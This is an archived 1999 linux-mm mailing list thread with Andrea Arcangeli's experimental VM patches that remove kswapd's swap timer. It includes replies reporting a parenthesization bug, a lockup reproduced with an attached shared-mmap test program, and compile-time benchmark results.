 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +294,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +306,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +320,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +351,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +370,25 @@
 	return 0;
 }
 
+static inline unsigned long calc_swapout_weight(int priority)
+{
+	struct task_struct * p;
+	unsigned long total_vm = 0;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+	{
+		if (!p->swappable)
+			continue;
+		if (p->mm->rss == 0)
+			continue;
+		total_vm += p->mm->total_vm;
+	}
+	read_unlock(&tasklist_lock);
+
+	return total_vm / (priority+1);
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,7 +397,10 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
+
+	counter = calc_swapout_weight(priority);
 
 	/* 
 	 * We make one or two passes through the task list, indexed by 
@@ -374,23 +416,17 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter != 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
-	 		if (p->mm->rss <= 0)
+	 		if (p->mm->rss == 0)
 				continue;
 			/* Refresh swap_cnt? */
 			if (assign)
@@ -410,10 +446,11 @@
 		}
 
 		/*
-		 * Nonzero means we cleared out something, but only "1" means
-		 * that we actually free'd up a page as a result.
+		 * Nonzero means we cleared out something, and "1" means
+		 * that we actually moved a page from the process memory
+		 * to the swap cache (it's not been freed yet).
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
@@ -441,39 +478,62 @@
        printk ("Starting kswapd v%.*s\n", i, s);
 }
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	/*
+	 * NOTE: Here we allow also the process to do async swapout
+	 * because the swapout is really only a credit at the bank of
+	 * free memory right now. So we don't care to have it _now_.
+	 * Allowing async I/O we are going to improve drammatically
+	 * swapout performance -arca (discovered this afternoon ;) 980105
+	 */
+	if (swap_out(priority, gfp_mask & ~__GFP_WAIT))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
+
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		case 0:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
 
-	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+static int kswapd_free_pages(int kswapd_state)
+{
+	for(;;)
+	{
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
+			break;
+		if (atomic_read(&nr_tasks_freeing_memory))
 			break;
-	} while (time_before_eq(jiffies,end_time));
+		if (kswapd_task->need_resched)
+			schedule();
+	};
 	return kswapd_state;
 }
 
@@ -496,13 +556,6 @@
 	lock_kernel();
 
 	/*
-	 * Set the base priority to something smaller than a
-	 * regular process. We will scale up the priority
-	 * dynamically depending on how much memory we need.
-	 */
-	current->priority = (DEF_PRIORITY * 2) / 3;
-
-	/*
 	 * Tell the memory management that we're a "memory allocator",
 	 * and that if we need more memory we should get access to it
 	 * regardless (see "try_to_free_pages()"). "kswapd" should
@@ -516,7 +569,6 @@
 	 */
 	current->flags |= PF_MEMALLOC;
 
-	init_swap_timer();
 	kswapd_task = current;
 	while (1) {
 		int state = 0;
@@ -543,107 +595,37 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
 	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
-
 		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
+		atomic_inc(&nr_tasks_freeing_memory);
+		while (count--)
+		{
+			static int state = 0;
+			if (!do_free_page(&state, gfp_mask))
+			{
+				retval = 0;
+				break;
+			}
+		}
+		atomic_dec(&nr_tasks_freeing_memory);
 		current->flags &= ~PF_MEMALLOC;
 	}
 	unlock_kernel();
 
 	return retval;
 }
-
-/*
- * Wake up kswapd according to the priority
- *	0 - no wakeup
- *	1 - wake up as a low-priority process
- *	2 - wake up as a normal process
- *	3 - wake up as an almost real-time process
- *
- * This plays mind-games with the "goodness()"
- * function in kernel/sched.c.
- */
-static inline void kswapd_wakeup(struct task_struct *p, int priority)
-{
-	if (priority) {
-		p->counter = p->priority << priority;
-		wake_up_process(p);
-	}
-}
 
-/* 
- * The swap_tick function gets called on every clock tick.
- */
-void swap_tick(void)
+void kswapd_wakeup(void)
 {
-	struct task_struct *p = kswapd_task;
-
-	/*
-	 * Only bother to try to wake kswapd up
-	 * if the task exists and can be woken.
-	 */
-	if (p && (p->state & TASK_INTERRUPTIBLE)) {
-		unsigned int pages;
-		int want_wakeup;
-
-		/*
-		 * Schedule for wakeup if there isn't lots
-		 * of free memory or if there is too much
-		 * of it used for buffers or pgcache.
-		 *
-		 * "want_wakeup" is our priority: 0 means
-		 * not to wake anything up, while 3 means
-		 * that we'd better give kswapd a realtime
-		 * priority.
-		 */
-		want_wakeup = 0;
-		pages = nr_free_pages;
-		if (pages < freepages.high)
-			want_wakeup = 1;
-		if (pages < freepages.low)
-			want_wakeup = 2;
-		if (pages < freepages.min)
-			want_wakeup = 3;
-	
-		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
-}
+	struct task_struct * p = kswapd_task;
 
-/* 
- * Initialise the swap timer
- */
-
-void init_swap_timer(void)
-{
-	timer_table[SWAP_TIMER].expires = jiffies;
-	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	if (p && (p->state & TASK_INTERRUPTIBLE) &&
+	    !atomic_read(&nr_tasks_freeing_memory))
+		wake_up_process(p);
 }
Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.5 linux/mm/page_alloc.c:1.1.1.1.2.15
--- linux/mm/page_alloc.c:1.1.1.5	Sun Jan  3 20:42:44 1999
+++ linux/mm/page_alloc.c	Tue Jan  5 01:13:00 1999
@@ -151,7 +151,6 @@
 	if (!PageReserved(page) && atomic_dec_and_test(&page->count)) {
 		if (PageSwapCache(page))
 			panic ("Freeing swap cache page");
-		page->flags &= ~(1 << PG_referenced);
 		free_pages_ok(page->map_nr, 0);
 		return;
 	}
@@ -173,7 +172,6 @@
 		if (atomic_dec_and_test(&map->count)) {
 			if (PageSwapCache(map))
 				panic ("Freeing swap cache pages");
-			map->flags &= ~(1 << PG_referenced);
 			free_pages_ok(map_nr, order);
 			return;
 		}
@@ -260,7 +258,8 @@
 		if (nr_free_pages > freepages.min) {
 			if (!current->trashing_memory)
 				goto ok_to_allocate;
-			if (nr_free_pages > freepages.low) {
+			if (!(current->flags & PF_MEMALLOC) &&
+			    nr_free_pages > freepages.low) {
 				current->trashing_memory = 0;
 				goto ok_to_allocate;
 			}
@@ -271,8 +270,11 @@
 		 * memory.
 		 */
 		current->trashing_memory = 1;
-		if (!try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
+		if (!try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + 1<<order) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
 			goto nopage;
+	} else {
+		if (nr_free_pages < freepages.min)
+			kswapd_wakeup();
 	}
 ok_to_allocate:
 	spin_lock_irqsave(&page_alloc_lock, flags);
Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.13
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Mon Jan  4 18:42:52 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/include/linux/swap.h
diff -u linux/include/linux/swap.h:1.1.1.4 linux/include/linux/swap.h:1.1.1.1.2.10
--- linux/include/linux/swap.h:1.1.1.4	Tue Dec 29 01:39:03 1998
+++ linux/include/linux/swap.h	Tue Jan  5 01:12:59 1999
@@ -83,6 +83,7 @@
 
 /* linux/mm/vmscan.c */
 extern int try_to_free_pages(unsigned int gfp_mask, int count);
+extern void kswapd_wakeup(void);
 
 /* linux/mm/page_io.c */
 extern void rw_swap_page(int, unsigned long, char *, int);
@@ -167,9 +168,11 @@
 	count = atomic_read(&page->count);
 	if (PageSwapCache(page))
 	{
+#if 0
 		/* PARANOID */
 		if (page->inode != &swapper_inode)
 			panic("swap cache page has wrong inode\n");
+#endif
 		count += swap_count(page->offset) - 2;
 	}
 	if (PageFreeAfter(page))


Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 30%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05  0:32 30%                             ` Andrea Arcangeli
@ 1999-01-05  0:52 64%                               ` Zlatko Calusic
  1999-01-05  3:02 64%                               ` Zlatko Calusic
  1999-01-05 15:35 28%                               ` arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]] Andrea Arcangeli
  2 siblings, 0 replies; 200+ results
From: Zlatko Calusic @ 1999-01-05  0:52 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Linus Torvalds, Alan Cox, steve, bredelin, sct, linux-kernel,
	H.H.vanRiel, linux-mm

Andrea Arcangeli <andrea@e-mind.com> writes:

> -		if (!try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
> +		if (!try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + 1<<order) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

How about a pair of parentheses at a strategic place? :)

Other than that, your previous (-6?) patch really works good here.

It was once that I wanted to get rid of kswapd, too, but I thought it would
surely harm performance, so I dumped the idea. Now, I'm not at all sure. :)

Keep trying!
-- 
Zlatko
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05  0:32 30%                             ` Andrea Arcangeli
  1999-01-05  0:52 64%                               ` Zlatko Calusic
@ 1999-01-05  3:02 64%                               ` Zlatko Calusic
  1999-01-05 11:49 64%                                 ` Andrea Arcangeli
  1999-01-05 15:35 28%                               ` arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]] Andrea Arcangeli
  2 siblings, 1 reply; 200+ results
From: Zlatko Calusic @ 1999-01-05  3:02 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Linus Torvalds, Alan Cox, steve, bredelin, sct, linux-kernel,
	H.H.vanRiel, linux-mm

Andrea Arcangeli <andrea@e-mind.com> writes:

> On Mon, 4 Jan 1999, Andrea Arcangeli wrote:
> 
> > I am going to do something like that right now...
> 
> Here a new patch (arca-vm-7). It pratically removes kswapd for all places
> except the ATOMIC memory allocation if there aren't process that are just
> freeing memory. 
> 

You have a bug somewhere!

At this point (output of Alt-SysRq-M), machine locked:

Jan  5 03:49:14 atlas kernel: Free pages:         512kB 
Jan  5 03:49:14 atlas kernel:  ( Free: 128 (128 256 384) 
Jan  5 03:49:14 atlas kernel: 0*4kB 0*8kB 0*16kB 0*32kB 0*64kB 4*128kB = 512kB) 

Probably you have "< instead of <=", or similar logic problem
somewhere.

Bug revealed itself during "mmap-sync" run. It's a program that
utilises bug with shared mappings (you used to send patches for that
one, I don't know if they made it to the tree, so I check
occasionally).

Other than that, VM is really fast, in fact unbelievably fast. Kswapd
is very light on the CPU and interactive feel is great.
-- 
Zlatko
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05  3:02 64%                               ` Zlatko Calusic
@ 1999-01-05 11:49 64%                                 ` Andrea Arcangeli
  1999-01-05 13:23 62%                                   ` Zlatko Calusic
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-05 11:49 UTC (permalink / raw)
  To: Zlatko Calusic; +Cc: linux-kernel, linux-mm

On 5 Jan 1999, Zlatko Calusic wrote:

> At this point (output of Alt-SysRq-M), machine locked:

Are you been able to continue using SysRq-K?

Could you reproduce and press ALT-right+Scroll-Lock and tell me what the
kernel was executing at that time...

Could you send me also the proggy for the shared-mmaps to allow me to
reproduce?

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05 11:49 64%                                 ` Andrea Arcangeli
@ 1999-01-05 13:23 62%                                   ` Zlatko Calusic
  1999-01-05 15:42 64%                                     ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Zlatko Calusic @ 1999-01-05 13:23 UTC (permalink / raw)
  To: Andrea Arcangeli; +Cc: linux-kernel, linux-mm

[-- Attachment #1: Type: text/plain, Size: 811 bytes --]

Andrea Arcangeli <andrea@e-mind.com> writes:

> On 5 Jan 1999, Zlatko Calusic wrote:
> 
> > At this point (output of Alt-SysRq-M), machine locked:
> 
> Are you been able to continue using SysRq-K?

Erm... I continued with *&#&%$ Alt-SysRq-{S,U,B}.
That worked for me. :)

> 
> Could you reproduce and press ALT-right+Scroll-Lock and tell me what the
> kernel was executing at that time...
>

I tried few times, but to no avail. Looks like subtle race, bad news
for you, unfortunately.

*BUT*, after I pressed ctrl-c against mmap-sync in one of the torture
tests, the program stuck in down_failed (loadav += 2). Few minutes
later machine got very unstable and I decided to reboot it. Go figure.

> Could you send me also the proggy for the shared-mmaps to allow me to
> reproduce?
> 

Sure, just be careful. :)


[-- Attachment #2: Exercise shared mappings --]
[-- Type: application/octet-stream, Size: 1009 bytes --]

#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>

/* 
 * file size, should be half of the size of the physical memory
 */
#define FILESIZE (32 * 1024 * 1024)

int main(void)
{
  char *ptr;
  int fd, i;
  char c = 'A';
  pid_t pid;

  if ((fd = open("foo", O_RDWR | O_CREAT | O_TRUNC)) == -1) {
    perror("open");
    exit(1);
  }
  lseek(fd, FILESIZE - 1, SEEK_SET);
  /* write one byte to extend the file */
  write(fd, &fd, 1);

  /* get a shared mapping */
  ptr = mmap(0, FILESIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
  if (ptr == NULL) {
    perror("mmap");
    exit(1);
  }

  /* touch all pages in the mapping */
  for (i = 0; i < FILESIZE; i += 4096)
    ptr[i] = c;

  while (1) {
    if ((pid = fork())) { /* parent, wait */
      waitpid(pid, NULL, 0);
    } else { /* child, exec away */
#if 0
      execl("/bin/echo", "echo", "blah");
#else
      fsync(fd);
      printf("blah\n");
      exit(0);
#endif
    }
    sleep(5);
  }
}

[-- Attachment #3: Type: text/plain, Size: 84 bytes --]


P.S. Apologies for too many jokes, I didn't sleep at all last night. ;)
-- 
Zlatko

^ permalink raw reply	[relevance 62%]

* Re: [patch] new-vm improvement [Re: 2.2.0 Bug summary]
  1999-01-03  2:59 32%                 ` Andrea Arcangeli
  1999-01-04 18:08 28%                   ` [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]] Andrea Arcangeli
@ 1999-01-05 13:33 62%                   ` Ben McCann
  1 sibling, 0 replies; 200+ results
From: Ben McCann @ 1999-01-05 13:33 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Steve Bergman, Linus Torvalds, Benjamin Redelings I,
	Stephen C. Tweedie, linux-kernel, Alan Cox, Rik van Riel,
	linux-mm

Hi Andrea,

My pet VM benchmark is the compilation of a set of about 50 C++
files which regularly grow the EGCS compiler VM size (as shown
by 'top') to 75 to 90 MB. I only have 64MB of RAM so it swaps a lot.

Here are the times (as measured by the 'time' command) for the
compilation of this suite of files (using 'make' and EGCS 1.0.1)
with 2.2.0pre4 and 2.2.0pre4 with your latest VM patch:

 TMS Compile with 2.2.0pre4
 589.830u 68.830s 18:09.88 60.4% 0+0k 0+0io 188062pf+260255w

 TMS Compile with 2.2.0pre4 and Andreas latest patch
 597.840u 71.030s 21:59.36 50.6% 0+0k 0+0io 298514pf+237324w
                  ^^^^^^^^                  ^^^^^^

Note the wall-clock time increases from 18 minutes to almost
22 minutes and the number of page faults increases from 188,000
to 298,500. It seems something is invalidating pages too aggressively
in your patch.

Is there something I can tune to improve this? Is there an experiment
I can run to help fine-tune your VM changes?

-Ben McCann

-- 
Ben McCann                              Indus River Networks
                                        31 Nagog Park
                                        Acton, MA, 01720
email: bmccann@indusriver.com           web: www.indusriver.com 
phone: (978) 266-8140                   fax: (978) 266-8111
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 62%]

* arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-05  0:32 30%                             ` Andrea Arcangeli
  1999-01-05  0:52 64%                               ` Zlatko Calusic
  1999-01-05  3:02 64%                               ` Zlatko Calusic
@ 1999-01-05 15:35 28%                               ` Andrea Arcangeli
  1999-01-06 14:48 63%                                 ` Andrea Arcangeli
  2 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-05 15:35 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Alan Cox, steve, bredelin, sct, linux-kernel, H.H.vanRiel,
	linux-mm

On Tue, 5 Jan 1999, Andrea Arcangeli wrote:

> Here a new patch (arca-vm-7). It pratically removes kswapd for all places

I fixed some thing in arca-vm-7. This new is arca-vm-8.

The main change is the fix of the trashing_memory heuristic. Now the the
free memory is always between low and high and it's left to the trashing
task to take the limits uptodate. This way I can run the swapout bench and
while :; do free; done, and the shell script _never_ gets blocked (as
opposed to arca-vm-7 and previous).

I return to right removing the referenced flag from the freed pages since
it seems to make no performance differences and it looks cleaner to me (I 
removed it in the last patch because I didn't benchmarked it and I
worried that it was the bit that made the difference between arca-vm-3).

The new patch returns to allow the pgcache to be shrunk even if pgcache
is under min. This make sense since this way shrink_mmap() is able to
really_swapout more pages even if we are really low on memory.

This new patches is very more efficient than the last one. I still don't
need kswapd...

Forget to tell, I moved the swapout weight to an exponential behavior... 
(since the new global patch it's working very better I have not compared
with the linear /(priority+1) thing).

I guess the lockup that Zlatko reported is due the bug he discovered (some
missing `()' ;). Thanks Zlatko. I tried a proggy that sync some shared
mmap and everything is fine here... 

I guess that this new code will be very better also in low memory machines
than the last one...

Index: linux/mm/vmscan.c
diff -u linux/mm/vmscan.c:1.1.1.9 linux/mm/vmscan.c:1.1.1.1.2.67
--- linux/mm/vmscan.c:1.1.1.9	Sat Jan  2 15:46:20 1999
+++ linux/mm/vmscan.c	Tue Jan  5 16:17:00 1999
@@ -10,6 +10,14 @@
  *  Version: $Id: vmscan.c,v 1.5 1998/02/23 22:14:28 sct Exp $
  */
 
+/*
+ * Developed the balanced page freeing algorithm (do_free_user_and_cache).
+ * Developed a smart mechanism to handle the swapout weight.
+ * Allowed the process to swapout async and only then get the credit from
+ * the bank. This has doubled swapout performances and fluidness.
+ * Copyright (C) 1998  Andrea Arcangeli
+ */
+
 #include <linux/slab.h>
 #include <linux/kernel_stat.h>
 #include <linux/swap.h>
@@ -21,12 +29,15 @@
 #include <asm/pgtable.h>
 
 /* 
+ * When are we next due for a page scan? 
+ */
+static atomic_t nr_tasks_freeing_memory = ATOMIC_INIT(0);
+
+/* 
  * The wait queue for waking up the pageout daemon:
  */
 static struct task_struct * kswapd_task = NULL;
 
-static void init_swap_timer(void);
-
 /*
  * The swap-out functions return 1 if they successfully
  * threw something out, and we got a free page. It returns
@@ -163,7 +174,7 @@
 			 * cache. */
 			if (PageSwapCache(page_map)) {
 				__free_page(page_map);
-				return (atomic_read(&page_map->count) == 0);
+				return 1;
 			}
 			add_to_swap_cache(page_map, entry);
 			/* We checked we were unlocked way up above, and we
@@ -195,7 +206,7 @@
 		flush_tlb_page(vma, address);
 		swap_duplicate(entry);
 		__free_page(page_map);
-		return (atomic_read(&page_map->count) == 0);
+		return 1;
 	} 
 	/* 
 	 * A clean page to be discarded?  Must be mmap()ed from
@@ -210,9 +221,8 @@
 	flush_cache_page(vma, address);
 	pte_clear(page_table);
 	flush_tlb_page(vma, address);
-	entry = (atomic_read(&page_map->count) == 1);
 	__free_page(page_map);
-	return entry;
+	return 1;
 }
 
 /*
@@ -230,7 +240,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -251,18 +261,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -282,9 +294,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -292,7 +306,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -306,16 +320,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -334,9 +351,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -350,6 +370,25 @@
 	return 0;
 }
 
+static inline unsigned long calc_swapout_weight(int priority)
+{
+	struct task_struct * p;
+	unsigned long total_vm = 0;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+	{
+		if (!p->swappable)
+			continue;
+		if (p->mm->rss == 0)
+			continue;
+		total_vm += p->mm->total_vm;
+	}
+	read_unlock(&tasklist_lock);
+
+	return total_vm >> (priority>>1);
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -358,7 +397,10 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
+
+	counter = calc_swapout_weight(priority);
 
 	/* 
 	 * We make one or two passes through the task list, indexed by 
@@ -374,23 +416,17 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
